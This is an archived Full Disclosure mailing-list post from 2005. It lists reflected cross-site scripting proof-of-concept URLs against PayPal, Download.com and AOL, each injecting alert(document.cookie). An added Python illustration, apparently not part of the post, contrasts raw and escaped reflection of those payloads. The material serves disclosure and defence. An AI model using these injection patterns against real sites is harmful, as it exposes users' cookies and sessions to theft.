Full Disclosure mailing list archives
Big Sites That Are Vulnerable To XSS
From: tuytumadre () att net
Date: Thu, 21 Apr 2005 04:19:58 +0000
The following have been previously responsibly disclosed, and, because of the lack of action taken on the vendors' parts, full disclosure is necessary to eliminate the threat of what's called "security by obscurity."

paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--

download.com
http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--

aol.com*
https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D

*on aol.com, the victim must be logged in to the website screenname service to be vulnerable.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
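The three PoC URLs in the post land in two different output contexts: the paypal.com and download.com payloads close an HTML comment (`-->`) and reopen one (`<!--`), while the aol.com payload closes a JavaScript string literal (`";}`). The Python below is an added illustration, not code from the post or from any of the sites: it pulls each payload out of the quoted URL, reflects it into a constructed stand-in template both raw and with context-appropriate encoding, and checks which rendering leaves a live script. The templates and the shortened AOL URL are assumptions.

```python
import html
import json
from urllib.parse import urlsplit, unquote

# PoC URLs quoted from the post (AOL one shortened to the parameters that matter).
POC_URLS = {
    "paypal": "http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--",
    "download": 'http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--',
    "aol": 'https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2',
}

def query_param(url, name):
    """Decoded value of one query parameter; split on '&' only so the ';' in the AOL payload survives."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None

# Constructed stand-ins for the vulnerable pages (assumed, not the sites' real markup).
COMMENT_TMPL = "<!-- view={value} -->"                  # parameter reflected inside an HTML comment
JS_TMPL = "<script>var siteDomain = {value};</script>"  # parameter reflected inside a JS string

def render_unsafe_comment(value):
    return COMMENT_TMPL.format(value=value)             # raw reflection, as the PoC relies on

def render_safe_comment(value):
    # Encode HTML metacharacters and '-' so neither '-->' nor '--!>' can appear in the output.
    return COMMENT_TMPL.format(value=html.escape(value).replace("-", "&#45;"))

def render_unsafe_js(value):
    return JS_TMPL.format(value='"' + value + '"')      # raw reflection inside the quotes

def render_safe_js(value):
    # JSON string literal, plus '<' and '>' escaped so a '</script>' in the value cannot end the block.
    literal = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return JS_TMPL.format(value=literal)

def script_outside_comment(page):
    """True if a <script tag ends up after the first comment close, i.e. as live markup."""
    _, closed, rest = page.partition("-->")
    return bool(closed) and "<script" in rest.lower()

def js_literal_intact(page, original):
    """True if the reflected JS string literal still parses back to the original value."""
    start = page.index("var siteDomain = ") + len("var siteDomain = ")
    end = page.rindex(";</script>")
    try:
        return json.loads(page[start:end]) == original
    except ValueError:
        return False
```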
Current thread:
- Big Sites That Are Vulnerable To XSS tuytumadre (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Morning Wood (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Jerome ATHIAS (Apr 21)
- Re: Big Sites That Are Vulnerable To XSS Dominik Birk (Apr 27)